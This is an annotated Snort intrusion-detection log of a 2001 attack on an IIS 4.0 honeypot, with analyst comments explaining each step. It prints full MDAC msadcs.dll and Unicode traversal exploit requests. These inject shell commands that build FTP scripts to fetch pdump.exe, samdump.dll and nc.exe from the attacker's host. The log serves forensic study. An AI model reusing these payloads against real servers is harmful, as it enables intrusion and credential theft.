.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After about a minute, the MDAC exploit is used to send an open command (to his own machine)
!@# This will not work though because cmd.exe does not know this is for the ftp session.
!@# The intruder likely got suspicious after no connections were made to his machine after the better part of a minute
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:27.521384 213.116.251.162:1840 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11568 IpLen:20 DgmLen:780 DF
***AP*** Seq: 0x9A3C2272 Ack: 0x2CBAA953 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 549..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 340..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.2...1.3.9...1.
2...2.6.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.
e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.
\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...
m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to start yet another FTP script called sasfile
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:29.736949 213.116.251.162:1842 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11579 IpLen:20 DgmLen:788 DF
***AP*** Seq: 0x9A465B87 Ack: 0x2CBAB248 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 557..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 348..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.
>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.
i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.
t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:31.855334 213.116.251.162:1844 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11590 IpLen:20 DgmLen:790 DF
***AP*** Seq: 0x9A4FFAF9 Ack: 0x2CBABA9D Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 559..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 350..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .
>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.
t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.
w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.
s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The purpose of this file is to try to download the toolkit again
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:33.939196 213.116.251.162:1846 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11602 IpLen:20 DgmLen:800 DF
***AP*** Seq: 0x9A591BD3 Ack: 0x2CBAC284 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 569..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 360..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p.
..e.x.e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.
r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.
q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.
\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:36.006964 213.116.251.162:1848 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11613 IpLen:20 DgmLen:804 DF
***AP*** Seq: 0x9A62897E Ack: 0x2CBACAC5 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 573..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 364..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.
m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.
i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.
d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.
a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:38.482725 213.116.251.162:1850 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11624 IpLen:20 DgmLen:794 DF
***AP*** Seq: 0x9A6D82FF Ack: 0x2CBAD497 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 563..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 354..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.
e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.
o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.
:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.
c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:40.525442 213.116.251.162:1852 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11634 IpLen:20 DgmLen:782 DF
***AP*** Seq: 0x9A76DCCC Ack: 0x2CBADC4B Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 551..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 342..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.
s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.
c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.
t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r.
..m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# MDAC vulnerability is used to run the FTP client in scripted mode with the 'sasfile' script
!@# Again, the script file had no open command
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:42.452596 213.116.251.162:1854 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11645 IpLen:20 DgmLen:772 DF
***AP*** Seq: 0x9A7FBB13 Ack: 0x2CBAE41E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 541..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 332..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.
".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .
D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.
p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;.
..--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After about a minute and a half he/she uses the MDAC vulnerability to send the open command to self
!@# Again, this will not do anything as cmd.exe does not recognize 'open' as a valid command
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:11.229519 213.116.251.162:1857 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11673 IpLen:20 DgmLen:784 DF
***AP*** Seq: 0x9BD42341 Ack: 0x2CBC3E8E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 553..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 344..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.3...1.1.6...2.
5.1...1.6.2.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.
c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.
n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.
r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC to append a username 'johna2k' to 'sasfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:13.430802 213.116.251.162:1859 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11684 IpLen:20 DgmLen:788 DF
***AP*** Seq: 0x9BDDEF1B Ack: 0x2CBC4779 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 557..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 348..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.
>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.
i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.
t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to append password 'haxedj00' to 'sasfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:15.340768 213.116.251.162:1861 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11694 IpLen:20 DgmLen:790 DF
***AP*** Seq: 0x9BE6D101 Ack: 0x2CBC4EE8 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 559..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 350..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .
>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.
t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.
w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.
s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to append commands to get tools to 'sasfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:17.354573 213.116.251.162:1863 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11704 IpLen:20 DgmLen:800 DF
***AP*** Seq: 0x9BEFE2A0 Ack: 0x2CBC5689 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 569..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 360..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p.
..e.x.e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.
r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.
q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.
\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:19.358555 213.116.251.162:1865 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11714 IpLen:20 DgmLen:804 DF
***AP*** Seq: 0x9BF94C83 Ack: 0x2CBC5EA2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 573..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 364..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.
m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.
i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.
d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.
a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:21.541600 213.116.251.162:1867 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11725 IpLen:20 DgmLen:794 DF
***AP*** Seq: 0x9C02E2E3 Ack: 0x2CBC671F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 563..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 354..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.
e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.
o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.
:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.
c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:23.571942 213.116.251.162:1869 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11736 IpLen:20 DgmLen:782 DF
***AP*** Seq: 0x9C0C21D3 Ack: 0x2CBC6F06 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 551..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 342..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.
s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.
c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.
t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r.
..m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run ftp client with 'sasfile' script
!@# But nothing happens since an ftp connection is never opened. (This may lock these files)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:25.525415 213.116.251.162:1871 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11747 IpLen:20 DgmLen:772 DF
***AP*** Seq: 0x9C14D6EA Ack: 0x2CBC76C4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 541..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 332..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.
".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .
D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.
p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;.
..--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to make a copy of cmd.exe (named cmd1.exe)
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:03.136533 213.116.251.162:1874 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11783 IpLen:20 DgmLen:356 DF
***AP*** Seq: 0x9CA64B94 Ack: 0x2CBD0981 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../winnt/system32/cmd.e
xe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1..Accept:
*/*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..Use
r-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hot
bar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:03.245941 172.16.1.106:80 -> 213.116.251.162:1874
TCP TTL:127 TOS:0x0 ID:57720 IpLen:20 DgmLen:441 DF
***AP*** Seq: 0x2CBD0981 Ack: 0x9CA64CD0 Win: 0x20FC TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:39:58 GMT..Connection: close..Content-Length: 2
42..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
1 file(s
) copied...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to overwrite 'ftpcom' FTP script, this time starting with an open command.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:09.452882 213.116.251.162:1875 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11791 IpLen:20 DgmLen:380 DF
***AP*** Seq: 0x9CBF7851 Ack: 0x2CBD224E Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>f
tpcom HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Enco
ding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5
.01; Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connec
tion: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:09.578127 172.16.1.106:80 -> 213.116.251.162:1875
TCP TTL:127 TOS:0x0 ID:59000 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD224E Ack: 0x9CBF79A5 Win: 0x20E4 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:05 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
